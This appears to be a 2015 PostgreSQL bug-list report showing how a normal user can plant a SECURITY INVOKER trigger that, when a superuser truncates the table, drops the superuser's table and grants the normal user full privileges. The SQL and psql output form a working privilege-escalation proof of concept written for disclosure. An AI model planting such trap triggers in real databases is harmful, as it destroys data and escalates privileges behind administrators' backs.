| From: | digoal(at)126(dot)com |
|---|---|
| To: | pgsql-bugs(at)postgresql(dot)org |
| Subject: | BUG #13651: trigger security invoker attack |
| Date: | 2015-09-29 11:57:37 |
| Message-ID: | 20150929115737.1448.91255@wrigleys.postgresql.org |
| Views: | Raw Message | Whole Thread | Download mbox | Resend email |
| Thread: | |
| Lists: | pgsql-bugs |
The following bug has been logged on the website:
Bug reference: 13651
Logged by: digoal
Email address: digoal(at)126(dot)com
PostgreSQL version: 9.4.4
Operating system: CentOS 6.x x64
Description:
In my database, there have two role, one normal user, one superuser.
postgres=# \dt
List of relations
Schema | Name | Type | Owner
--------+------------------+-------+----------
public | customer_reviews | table | postgres
public | t | table | digoal
public | t1 | table | postgres
public | t2 | table | postgres
public | t3 | table | postgres
I can use normal user create a table , and then create a trigger , in
trigger
I drop superuser's table and grant all privilege to normal user.
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> create table temp_table (id int);
CREATE TABLE
postgres=> create or replace function tg1() returns trigger as $$
declare
begin
drop table t1 cascade;
grant all on table t2 to digoal;
return null;
end;
$$ language plpgsql security invoker;
CREATE FUNCTION
postgres=> create trigger tg2 before truncate on temp_table for each
statement execute procedure tg1();
CREATE TRIGGER
when a superuser truncate the temp table,
the trigger will execute,and drop superuser's table t1, and grant t2.
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# truncate temp_table ;
NOTICE: 00000: drop cascades to rule r1 on table t
CONTEXT: SQL statement "drop table t1 cascade"
PL/pgSQL function tg1() line 4 at SQL statement
LOCATION: reportDependentObjects, dependency.c:996
TRUNCATE TABLE
postgres=# \dp+ t2
Access privileges
Schema | Name | Type | Access privileges | Column access
privileges
--------+------+-------+---------------------------+--------------------------
public | t2 | table | postgres=arwdDxt/postgres+|
| | | digoal=arwdDxt/postgres |
(1 row)
And rule is security.
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> create rule r1 as on delete to t do instead delete from t1;
CREATE RULE
postgres=> delete from t;
ERROR: permission denied for relation t1
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# \set VERBOSITY verbose
postgres=# delete from t;
ERROR: 42501: permission denied for relation t1
LOCATION: aclcheck_error, aclchk.c:3371
| From | Date | Subject | |
|---|---|---|---|
| Next Message | Tom Lane | 2015-09-29 13:13:46 | Re: BUG #13649: system catalog pg_authid doesn't update automatically |
| Previous Message | sivanov99901 | 2015-09-29 10:58:36 | BUG #13650: getTypeBinaryStringInfo segfault |